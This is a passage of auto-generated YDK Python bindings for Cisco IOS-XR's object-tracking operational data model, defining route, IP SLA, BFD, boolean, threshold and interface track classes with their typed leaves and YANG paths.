**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo']['meta_info']
class BoolTracks(_Entity_):
"""
boolean objects
.. attribute:: bool_track_info
bool track info
**type**\: list of :py:class:`BoolTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks.BoolTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks, self).__init__()
self.yang_name = "bool-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("bool-track-info", ("bool_track_info", ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks.BoolTrackInfo))])
self._leafs = OrderedDict()
self.bool_track_info = YList(self)
self._segment_path = lambda: "bool-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks, [], name, value)
class BoolTrackInfo(_Entity_):
"""
bool track info
.. attribute:: object_name
Object Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: with_not
Track object with Not
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks.BoolTrackInfo, self).__init__()
self.yang_name = "bool-track-info"
self.yang_parent_name = "bool-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('with_not', (YLeaf(YType.boolean, 'with-not'), ['bool'])),
])
self.object_name = None
self.track_state = None
self.with_not = None
self._segment_path = lambda: "bool-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/bool-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks.BoolTrackInfo, ['object_name', 'track_state', 'with_not'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks.BoolTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks']['meta_info']
class ThresholdTracks(_Entity_):
"""
Threshold objects
.. attribute:: threshold_track_info
threshold track info
**type**\: list of :py:class:`ThresholdTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks.ThresholdTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks, self).__init__()
self.yang_name = "threshold-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold-track-info", ("threshold_track_info", ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks.ThresholdTrackInfo))])
self._leafs = OrderedDict()
self.threshold_track_info = YList(self)
self._segment_path = lambda: "threshold-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks, [], name, value)
class ThresholdTrackInfo(_Entity_):
"""
threshold track info
.. attribute:: object_name
Object name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
.. attribute:: weight
Weight is the number assigned to a track object . In case of a type threshold weight( i.e. weighted sum list), weight is asigned by User at the time of configuration. In case of a type threshold percentage (i.e. percentage based list), weight is internally computed by (1/N)x100, where N is the number of objects in the list
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: percentage
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks.ThresholdTrackInfo, self).__init__()
self.yang_name = "threshold-track-info"
self.yang_parent_name = "threshold-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('weight', (YLeaf(YType.uint32, 'weight'), ['int'])),
])
self.object_name = None
self.track_state = None
self.weight = None
self._segment_path = lambda: "threshold-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/threshold-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks.ThresholdTrackInfo, ['object_name', 'track_state', 'weight'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks.ThresholdTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks']['meta_info']
class TrackingInteraces(_Entity_):
"""
Tracking Interfaces
.. attribute:: interface_tracking_info
interface tracking info
**type**\: list of :py:class:`InterfaceTrackingInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces.InterfaceTrackingInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces, self).__init__()
self.yang_name = "tracking-interaces"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracking-info", ("interface_tracking_info", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces.InterfaceTrackingInfo))])
self._leafs = OrderedDict()
self.interface_tracking_info = YList(self)
self._segment_path = lambda: "tracking-interaces"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces, [], name, value)
class InterfaceTrackingInfo(_Entity_):
"""
interface tracking info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, self).__init__()
self.yang_name = "interface-tracking-info"
self.yang_parent_name = "tracking-interaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracking-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/tracking-interaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces.InterfaceTrackingInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces']['meta_info']
class Delayed(_Entity_):
"""
Is the state change delay counter in progress
.. attribute:: time_remaining
The time remaining in seconds for the counter to trigger state change
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: track_state
State the track will transition to. Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed, self).__init__()
self.yang_name = "delayed"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.time_remaining = None
self.track_state = None
self._segment_path = lambda: "delayed"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed, ['time_remaining', 'track_state'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability']['meta_info']
class TrackTypeRtrReachabilityBrief(_Entity_):
"""
Object Tracking Type RTR Reachability brief info
.. attribute:: track_info_brief
track info brief
**type**\: list of :py:class:`TrackInfoBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief, self).__init__()
self.yang_name = "track-type-rtr-reachability-brief"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info-brief", ("track_info_brief", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief))])
self._leafs = OrderedDict()
self.track_info_brief = YList(self)
self._segment_path = lambda: "track-type-rtr-reachability-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief, [], name, value)
class TrackInfoBrief(_Entity_):
"""
track info brief
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief, self).__init__()
self.yang_name = "track-info-brief"
self.yang_parent_name = "track-type-rtr-reachability-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.track_type_info = ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self._segment_path = lambda: "track-info-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief, ['tracke_name', 'type', 'track_state'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/track-info-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
